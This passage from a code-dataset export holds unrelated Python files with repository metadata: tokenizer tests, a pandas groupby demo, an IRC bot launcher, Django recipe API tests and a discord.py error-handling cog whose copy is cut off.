Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=23, end_line=2, end_char=35, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_always_returns_4grams_when_requested(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the
names {{}}of its contributors may materials provided with
the distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=4))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=0, start_char=52, end_line=0, end_char=55, end=0, gap=0, value=u'the'),
Token(start=0, start_line=1, start_char=19, end_line=1, end_char=24, end=0, gap=5, value=u'names')),
(Token(start=0, start_line=1, start_char=29, end_line=1, end_char=31, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=23, end_line=2, end_char=35, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_can_handle_contiguous_template_regions(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}
{{6 }}of its contributors may materials provided with the
distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=4))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=1, start_char=25, end_line=1, end_char=27, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=28, end_line=1, end_char=31, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=28, end_line=1, end_char=31, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with'),
Token(start=0, start_line=1, start_char=73, end_line=1, end_char=76, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with'),
Token(start=0, start_line=1, start_char=73, end_line=1, end_char=76, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=31, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_ngram_tokenizer_can_handle_gaps_at_end_of_text(self):
lines = [u'Neither the name of {{10 the ORGANIZATION}} ']
ngram_len = 2
result = list(ngram_tokenizer(lines, ngram_len, template=True))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'neither', u'the')),
Token(start=1, start_line=0, start_char=8, end_line=0, end_char=16, end=2, gap=0, value=(u'the', u'name')),
Token(start=2, start_line=0, start_char=12, end_line=0, end_char=19, end=3, gap=10, value=(u'name', u'of'))
]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_n3(self):
lines = [u'X11 License']
ngram_len = 3
result = list(ngram_tokenizer(lines, ngram_len))
assert lines == list(doc_subset(lines, result[0]))
expected = [Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'x11', u'license'))]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_n1(self):
lines = [u'X11 License']
ngram_len = 1
result = list(ngram_tokenizer(lines, ngram_len))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=3, end=0, gap=0, value=(u'x11',)),
Token(start=1, start_line=0, start_char=4, end_line=0, end_char=11, end=1, gap=0, value=(u'license',)),
]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_template(self):
lines = [u'X11 License']
ngram_len = 3
result = list(ngram_tokenizer(lines, ngram_len, template=True))
assert lines == list(doc_subset(lines, result[0]))
expected = [Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'x11', u'license'))]
assert expected == result
def test_unicode_text_lines_handles_weird_xml_encodings(self):
test_file = self.get_test_loc('analysis/weird_encoding/easyconf-0.9.0.pom')
result = list(unicode_text_lines(test_file))
expected_file = self.get_test_loc('analysis/weird_encoding/easyconf-0.9.0.pom.expected')
with open(expected_file, 'rb') as tf:
expected = cPickle.load(tf)
assert expected == result
class TestMultigrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
@skipIf(True, 'Performance tests only')
class TestAnalysisPerformance(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_splitter_perf(self):
test_file = self.get_test_loc('perf/test.txt')
text = open(test_file).read() * 100
utext = unicode(text)
setup1 = '''
import re
from textcode import analysis
unicode_ws = analysis.word_splitter
plain_ws =re.compile(r'[^\W_]+').finditer
unicode_ts = analysis.template_splitter
plain_ts= re.compile(r'(?:[^\W_])+|(?:\{\{)|(?:\}\})').finditer
text = %r
utext = %r''' % (text, utext)
def check_perf(setup):
from timeit import timeit
stmt = 'list(w for w in %s(%s))'
print()
print('Unicode template')
print(timeit(stmt % ('unicode_ts', 'utext'), setup=setup, number=1000))
print('Plain template')
print(timeit(stmt % ('plain_ts', 'text'), setup=setup, number=1000))
print('Unicode words')
print(timeit(stmt % ('unicode_ws', 'utext'), setup=setup, number=1000))
print('Plain words')
print(timeit(stmt % ('plain_ws', 'text'), setup=setup, number=1000))
print('Plain split')
print(timeit('text.split()', setup=setup, number=1000))
print('Unicode split')
print(timeit('utext.split()', setup=setup, number=1000))
print('Line split')
print(timeit('text.splitlines(False)', setup=setup, number=1000))
print('Line split with ends')
print(timeit('text.splitlines(True)', setup=setup, number=1000))
check_perf(setup=setup1)
setup2 = '''
import re
from textcode import analysis
unicode_ws = analysis.word_splitter
plain_ws =re.compile(r'[^\W_]+').finditer
unicode_ts = analysis.template_splitter
plain_ts= re.compile(r'(?:[^\W_])+|(?:\{\{)|(?:\}\})').finditer
text = %r
utext = %r''' % (text, utext)
check_perf(setup=setup2)
| true
| true
|
790afbc9aeeb08b0b8b41599887496d1db936b30
| 630
|
py
|
Python
|
BasicOperations/05_Pandas/05_Pandas_02_groupby.py
|
UpSea/midProjects
|
ed6086e74f68b1b89f725abe0b270e67cf8993a8
|
[
"MIT"
] | 1
|
2018-07-02T13:54:49.000Z
|
2018-07-02T13:54:49.000Z
|
BasicOperations/05_Pandas/05_Pandas_02_groupby.py
|
UpSea/midProjects
|
ed6086e74f68b1b89f725abe0b270e67cf8993a8
|
[
"MIT"
] | null | null | null |
BasicOperations/05_Pandas/05_Pandas_02_groupby.py
|
UpSea/midProjects
|
ed6086e74f68b1b89f725abe0b270e67cf8993a8
|
[
"MIT"
] | 3
|
2016-05-28T15:13:02.000Z
|
2021-04-10T06:04:25.000Z
|
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.randn(10,3),columns=['a','b','c'],index=list('abcdefghij'))
print(df)
df.iloc[::2,0] = np.nan; df.iloc[::4,1] = np.nan; df.iloc[::3,2] = np.nan
df = df.dropna(subset=['a','b'])  # drop rows where column 'a' or 'b' is NaN
bins = np.arange(-3,3,0.1)
bins = [-100,0,100]
indices = np.digitize(df.a,bins)
'''
bins defines a set of contiguous intervals, e.g. 0:[-1,2), 1:[2,7), 2:[7,9), 3:[9,10),
written as the array [-1,2,7,9,10].
np.digitize() returns, for each element of its first argument, the index of the bin in bins into which that value falls.
'''
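# Illustration with the bins used here (input values are arbitrary):
#     np.digitize([-0.5, 0.3], [-100, 0, 100])  ->  array([1, 2])
# Values in [-100, 0) get bin index 1 and values in [0, 100) get bin index 2,
# so groupby(indices) below splits the rows on the sign of column 'a'.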
groups = df.groupby(indices)
print('#'*20)
for i,group in groups:
print(i,len(group))
print(group)
print('#'*20)
print(groups.mean())
| 26.25
| 87
| 0.631746
|
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.randn(10,3),columns=['a','b','c'],index=list('abcdefghij'))
print(df)
df.iloc[::2,0] = np.nan; df.iloc[::4,1] = np.nan; df.iloc[::3,2] = np.nan
df = df.dropna(subset=['a','b'])
bins = np.arange(-3,3,0.1)
bins = [-100,0,100]
indices = np.digitize(df.a,bins)
groups = df.groupby(indices)
print('#'*20)
for i,group in groups:
print(i,len(group))
print(group)
print('#'*20)
print(groups.mean())
| true
| true
|
790afc2450ce2af23351778162b454ecb9eac51c
| 1,375
|
py
|
Python
|
__init__.py
|
wolfy1339/Kenni
|
5885b5e600c6cb4a1db2ad82ec0f5b24d3fc0b4f
|
[
"EFL-2.0"
] | null | null | null |
__init__.py
|
wolfy1339/Kenni
|
5885b5e600c6cb4a1db2ad82ec0f5b24d3fc0b4f
|
[
"EFL-2.0"
] | null | null | null |
__init__.py
|
wolfy1339/Kenni
|
5885b5e600c6cb4a1db2ad82ec0f5b24d3fc0b4f
|
[
"EFL-2.0"
] | null | null | null |
#!/usr/bin/env python3
import sys, os, time, threading, signal
import bot
class Watcher(object):
# Cf. http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/496735
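# Forks the process: the child returns here and goes on to run the bot, while the
# parent blocks in watch() and, on Ctrl-C, kills the child before exiting.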
def __init__(self):
self.child = os.fork()
if self.child != 0:
self.watch()
def watch(self):
try: os.wait()
except KeyboardInterrupt:
self.kill()
sys.exit()
def kill(self):
try: os.kill(self.child, signal.SIGKILL)
except OSError: pass
def run_kenni(config):
if hasattr(config, 'delay'):
delay = config.delay
else: delay = 20
def connect(config):
p = bot.kenni(config)
p.use_ssl = config.ssl
p.use_sasl = config.sasl
p.run(config.host, config.port)
try: Watcher()
except Exception as e:
print('Warning:', e, '(in __init__.py)', file=sys.stderr)
while True:
try: connect(config)
except KeyboardInterrupt:
sys.exit()
if not isinstance(delay, int):
break
warning = 'Warning: Disconnected. Reconnecting in %s seconds...' % delay
print(warning, file=sys.stderr)
time.sleep(delay)
def run(config):
t = threading.Thread(target=run_kenni, args=(config,))
if hasattr(t, 'run'):
t.run()
else: t.start()
if __name__ == '__main__':
print(__doc__)
| 24.122807
| 80
| 0.584
|
import sys, os, time, threading, signal
import bot
class Watcher(object):
def __init__(self):
self.child = os.fork()
if self.child != 0:
self.watch()
def watch(self):
try: os.wait()
except KeyboardInterrupt:
self.kill()
sys.exit()
def kill(self):
try: os.kill(self.child, signal.SIGKILL)
except OSError: pass
def run_kenni(config):
if hasattr(config, 'delay'):
delay = config.delay
else: delay = 20
def connect(config):
p = bot.kenni(config)
p.use_ssl = config.ssl
p.use_sasl = config.sasl
p.run(config.host, config.port)
try: Watcher()
except Exception as e:
print('Warning:', e, '(in __init__.py)', file=sys.stderr)
while True:
try: connect(config)
except KeyboardInterrupt:
sys.exit()
if not isinstance(delay, int):
break
warning = 'Warning: Disconnected. Reconnecting in %s seconds...' % delay
print(warning, file=sys.stderr)
time.sleep(delay)
def run(config):
t = threading.Thread(target=run_kenni, args=(config,))
if hasattr(t, 'run'):
t.run()
else: t.start()
if __name__ == '__main__':
print(__doc__)
| true
| true
|
790afd1d19d32dd258ab61a4b68347d143f85086
| 6,633
|
py
|
Python
|
app/recipe/tests/test_recipe_api.py
|
jamie-chapman/django-exercise-recipe-app
|
0ad569c747ca3dc538dbda1d1035a2d2c438f43b
|
[
"MIT"
] | null | null | null |
app/recipe/tests/test_recipe_api.py
|
jamie-chapman/django-exercise-recipe-app
|
0ad569c747ca3dc538dbda1d1035a2d2c438f43b
|
[
"MIT"
] | null | null | null |
app/recipe/tests/test_recipe_api.py
|
jamie-chapman/django-exercise-recipe-app
|
0ad569c747ca3dc538dbda1d1035a2d2c438f43b
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
from core.models import Recipe, Ingredient
RECIPE_URL = reverse('recipe:recipe-list')
def recipe_url(id):
"""Construct URL for a single recipe based on its ID"""
return reverse('recipe:recipe-detail', args=[id])
def create_sample_recipe(**params):
"""Helper function to create a user"""
return Recipe.objects.create(**params)
class RecipeAPITests(TestCase):
def setUp(self):
self.client = APIClient()
def test_create_recipe_with_ingredients(self):
"""Test creating a recipe including ingredients"""
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.',
'ingredients': [
{'name': 'carrots'},
{'name': 'potatoes'},
{'name': 'mushrooms'},
]
}
response = self.client.post(RECIPE_URL, payload, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(
payload['name'],
Recipe.objects.get(id=response.data['id']).name
)
self.assertEquals(
len(response.data['ingredients']),
len(payload['ingredients'])
)
def test_get_recipes(self):
"""Test retrieving a recipe"""
create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
create_sample_recipe(
name='Beans on Toast',
description='Just the best.'
)
response = self.client.get(RECIPE_URL)
recipes = Recipe.objects.all().order_by('-name')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), len(recipes))
def test_get_recipe(self):
"""Test retrieving a single recipe using name as filter"""
test_recipe_name = 'Beans on Toast'
create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
create_sample_recipe(
name=test_recipe_name,
description='Just the best recipe.'
)
response = self.client.get(RECIPE_URL, {'name': test_recipe_name})
recipes = Recipe.objects.all().order_by('-name')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertNotEqual(len(response.data), len(recipes))
self.assertEqual(response.data[0]['name'], test_recipe_name)
def test_update_recipe(self):
"""Test updating a recipe"""
self.recipe = create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.'
}
response = self.client.patch(
recipe_url(self.recipe.id),
payload, format='json'
)
self.recipe.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.recipe.name, response.data['name'])
self.assertEqual(self.recipe.description, response.data['description'])
def test_delete_recipe(self):
"""Test deleting a recipe"""
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
response = self.client.delete(
recipe_url(self.recipe.id),
format='json'
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertFalse(Recipe.objects.all())
def test_get_recipes_with_ingredients(self):
"""Test retrieving a recipe including ingredients"""
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
Ingredient.objects.create(name='Carrots', recipe=self.recipe)
Ingredient.objects.create(name='Icing Sugar', recipe=self.recipe)
response = self.client.get(RECIPE_URL)
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEquals(
len(response.data[0]['ingredients']),
len(ingredients)
)
def test_update_recipe_ingredients(self):
"""Test updating a recipe with ingredients included"""
self.recipe = create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.',
'ingredients': [
{'name': 'carrots'},
{'name': 'potatoes'},
{'name': 'mushrooms'},
]
}
response = self.client.patch(
recipe_url(self.recipe.id),
payload, format='json'
)
self.recipe.refresh_from_db()
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(ingredients), len(payload['ingredients']))
self.assertEqual(ingredients[0].recipe.name, payload['name'])
def test_delete_recipe_with_ingredients(self):
"""Test deleting a recipe with ingredients included"""
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
Ingredient.objects.create(name='Carrots', recipe=self.recipe)
Ingredient.objects.create(name='Icing Sugar', recipe=self.recipe)
response = self.client.delete(
recipe_url(self.recipe.id),
format='json'
)
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertFalse(Recipe.objects.all())
self.assertEqual(len(ingredients), 0)
| 31.889423
| 79
| 0.599276
|
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
from core.models import Recipe, Ingredient
RECIPE_URL = reverse('recipe:recipe-list')
def recipe_url(id):
return reverse('recipe:recipe-detail', args=[id])
def create_sample_recipe(**params):
return Recipe.objects.create(**params)
class RecipeAPITests(TestCase):
def setUp(self):
self.client = APIClient()
def test_create_recipe_with_ingredients(self):
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.',
'ingredients': [
{'name': 'carrots'},
{'name': 'potatoes'},
{'name': 'mushrooms'},
]
}
response = self.client.post(RECIPE_URL, payload, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(
payload['name'],
Recipe.objects.get(id=response.data['id']).name
)
self.assertEquals(
len(response.data['ingredients']),
len(payload['ingredients'])
)
def test_get_recipes(self):
create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
create_sample_recipe(
name='Beans on Toast',
description='Just the best.'
)
response = self.client.get(RECIPE_URL)
recipes = Recipe.objects.all().order_by('-name')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), len(recipes))
def test_get_recipe(self):
test_recipe_name = 'Beans on Toast'
create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
create_sample_recipe(
name=test_recipe_name,
description='Just the best recipe.'
)
response = self.client.get(RECIPE_URL, {'name': test_recipe_name})
recipes = Recipe.objects.all().order_by('-name')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertNotEqual(len(response.data), len(recipes))
self.assertEqual(response.data[0]['name'], test_recipe_name)
def test_update_recipe(self):
self.recipe = create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.'
}
response = self.client.patch(
recipe_url(self.recipe.id),
payload, format='json'
)
self.recipe.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.recipe.name, response.data['name'])
self.assertEqual(self.recipe.description, response.data['description'])
def test_delete_recipe(self):
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
response = self.client.delete(
recipe_url(self.recipe.id),
format='json'
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertFalse(Recipe.objects.all())
def test_get_recipes_with_ingredients(self):
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
Ingredient.objects.create(name='Carrots', recipe=self.recipe)
Ingredient.objects.create(name='Icing Sugar', recipe=self.recipe)
response = self.client.get(RECIPE_URL)
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEquals(
len(response.data[0]['ingredients']),
len(ingredients)
)
def test_update_recipe_ingredients(self):
self.recipe = create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.',
'ingredients': [
{'name': 'carrots'},
{'name': 'potatoes'},
{'name': 'mushrooms'},
]
}
response = self.client.patch(
recipe_url(self.recipe.id),
payload, format='json'
)
self.recipe.refresh_from_db()
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(ingredients), len(payload['ingredients']))
self.assertEqual(ingredients[0].recipe.name, payload['name'])
def test_delete_recipe_with_ingredients(self):
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
Ingredient.objects.create(name='Carrots', recipe=self.recipe)
Ingredient.objects.create(name='Icing Sugar', recipe=self.recipe)
response = self.client.delete(
recipe_url(self.recipe.id),
format='json'
)
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertFalse(Recipe.objects.all())
self.assertEqual(len(ingredients), 0)
| true
| true
|
790afdca3defef0b96aa368a82626bcd7132e02d
| 4,324
|
py
|
Python
|
cogs/errorhandler.py
|
ZackHart2400/miso-bot
|
bbdcf65e1c5ed1dfe472f91804dcc39ae556dd83
|
[
"MIT"
] | null | null | null |
cogs/errorhandler.py
|
ZackHart2400/miso-bot
|
bbdcf65e1c5ed1dfe472f91804dcc39ae556dd83
|
[
"MIT"
] | null | null | null |
cogs/errorhandler.py
|
ZackHart2400/miso-bot
|
bbdcf65e1c5ed1dfe472f91804dcc39ae556dd83
|
[
"MIT"
] | null | null | null |
import traceback
import discord
import asyncio
from discord.ext import commands, flags
from helpers import exceptions, log, utilityfunctions as util
from data import database as db
logger = log.get_logger(__name__)
command_logger = log.get_logger("commands")
class Events(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
"""The event triggered when an error is raised while invoking a command."""
if hasattr(ctx.command, "on_error"):
return
error = getattr(error, "original", error)
if isinstance(error, commands.CommandNotFound):
return
if isinstance(error, commands.MissingRequiredArgument):
return await util.send_command_help(ctx)
command_logger.error(
f'{type(error).__name__:25} > {ctx.guild} ? {ctx.author} "{ctx.message.content}" > {error}'
)
if isinstance(error, util.ErrorMessage):
return await ctx.send(str(error))
if isinstance(error, commands.MissingPermissions):
perms = ", ".join(f"`{x}`" for x in error.missing_perms)
return await ctx.send(
f":warning: You require {perms} permission to use this command!"
)
elif isinstance(error, commands.BotMissingPermissions):
perms = ", ".join(f"`{x}`" for x in error.missing_perms)
return await ctx.send(
f":warning: Cannot execute command! Bot is missing permission {perms}"
)
elif isinstance(error, commands.CommandOnCooldown):
if db.is_patron(ctx.author.id, (2, 3)):
return await ctx.reinvoke()
else:
return await ctx.send(
f":hourglass: This command is on a cooldown! (`{error.retry_after:.2f}s` remaining)"
)
elif isinstance(error, commands.DisabledCommand):
await ctx.send(f":warning: `{ctx.command}` has been disabled!")
elif isinstance(error, commands.NoPrivateMessage):
await ctx.author.send(
":warning: You cannot use this command in private messages"
)
elif isinstance(error, util.PatronCheckFailure):
await ctx.send(":no_entry: Support me on patreon to use this command! <https://patreon.com/joinemm>")
elif isinstance(error, (commands.NotOwner, commands.CheckFailure)):
await ctx.send(
":warning: Sorry, you are not authorized to use this command!"
)
elif isinstance(error, exceptions.BlacklistTrigger):
if error.blacklist_type == "command":
message = "This command has been blacklisted by the server moderators"
elif error.blacklist_type == "channel":
message = "Command usage on this channel has been blacklisted by the server moderators"
elif error.blacklist_type == "user":
message = "You have been blacklisted from using commands by the server moderators"
elif error.blacklist_type == "global":
message = "You have been blacklisted from using Miso Bot"
delete = error.do_delete
await ctx.send(
f":no_entry_sign: `{message}`", delete_after=(5 if delete else None)
)
if delete:
await asyncio.sleep(5)
await ctx.message.delete()
elif isinstance(error, (commands.BadArgument, flags._parser.ArgumentParsingError)):
await ctx.send(f"```{str(error)}```")
elif isinstance(error, discord.errors.Forbidden):
try:
await ctx.send(f"```{str(error)}```")
except discord.errors.Forbidden:
try:
await ctx.message.add_reaction("🙊")
except discord.errors.Forbidden:
logger.error(str(error))
elif isinstance(error, exceptions.LastFMError):
await ctx.send(f"```{str(error)}```")
else:
traceback.print_exception(type(error), error, error.__traceback__)
await ctx.send(f"```\n{type(error).__name__}: {str(error)}```")
def setup(bot):
bot.add_cog(Events(bot))
| 37.929825
| 113
| 0.598289
|
import traceback
import discord
import asyncio
from discord.ext import commands, flags
from helpers import exceptions, log, utilityfunctions as util
from data import database as db
logger = log.get_logger(__name__)
command_logger = log.get_logger("commands")
class Events(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
if hasattr(ctx.command, "on_error"):
return
error = getattr(error, "original", error)
if isinstance(error, commands.CommandNotFound):
return
if isinstance(error, commands.MissingRequiredArgument):
return await util.send_command_help(ctx)
command_logger.error(
f'{type(error).__name__:25} > {ctx.guild} ? {ctx.author} "{ctx.message.content}" > {error}'
)
if isinstance(error, util.ErrorMessage):
